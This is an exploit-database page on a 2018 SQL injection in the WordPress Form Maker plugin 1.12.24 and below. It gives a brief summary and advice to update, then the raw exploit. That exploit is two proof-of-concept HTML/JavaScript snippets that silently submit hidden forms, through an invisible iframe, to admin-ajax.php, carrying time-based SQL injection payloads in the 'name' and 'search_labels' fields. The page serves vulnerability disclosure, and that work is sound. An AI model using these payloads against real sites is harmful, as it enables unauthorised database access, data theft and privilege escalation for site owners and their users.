header-logo
Suggest Exploit
vendor:
WordPress Form Maker Plugin
by:
Neven Biruski
N/A
CVSS
HIGH
SQL Injection
89
CWE
Product Name: WordPress Form Maker Plugin
Affected Version From: 1.12.24
Affected Version To: 1.12.24 and below
Patch Exists: YES
Related CWE:
CPE: a:wordpress:form_maker
Metasploit:
Other Scripts:
Platforms Tested:
2018

WordPress Form Maker Plugin 1.12.24 – SQL Injection

The SQL injection vulnerabilities in WordPress Form Maker Plugin 1.12.24 and below allow unauthorized users to escalate their privileges or access and modify database contents. The vulnerabilities can be exploited by submitting specially crafted forms with malicious SQL statements.

Mitigation:

Update the WordPress Form Maker plugin to the latest version.
Source

Exploit-DB raw data:

# Title: WordPress Form Maker Plugin 1.12.24 - SQL Injection
# Date: 2018-06-07
# Author: Neven Biruski
# Software: WordPress Form Maker plugin
# https://wordpress.org/plugins/form-maker/
# Version: 1.12.24 and below
# Vendor Status: Vendor contacted, update released

# The easiest way to reproduce the SQL injection vulnerabilities is to
# open the presented HTML/JavaScript snippet in your browser while being
# logged in as administrator or another user that is authorized to
# access the plugin settings page. Users that do not have full
# administrative privileges could abuse the database access the
# vulnerabilities provide to either escalate their privileges or obtain
# and modify database contents they were not supposed to be able to.

# PoC 1

<iframe style="display:none" name="invisible"></iframe>
<form id="form" method="POST" action="http://vulnerablesite.com/wp-admin/admin-ajax.php?action=FormMakerSQLMapping&task=db_table_struct"
target="invisible">
<input type="hidden" name="name" value="wp_users WHERE 42=42 AND SLEEP(42)--;"/>
</form>
<script>
 document.getElementById("form").submit();
 sleep(3000);
</script>

# PoC 2

<iframe style="display:none" name="invisible"></iframe>
<form id="form" method="POST" action="http://vulnerablesite.com/wp-admin/admin-ajax.php?form_id=6&send_header=0&action=generete_csv&limitstart=0"
target="invisible">
<input type="hidden" name="search_labels" value="2) AND (SELECT * FROM (SELECT(SLEEP(42)))XXX)-- XXX"/>
</form>
<script>
 document.getElementById("form").submit();
 sleep(3000);
</script>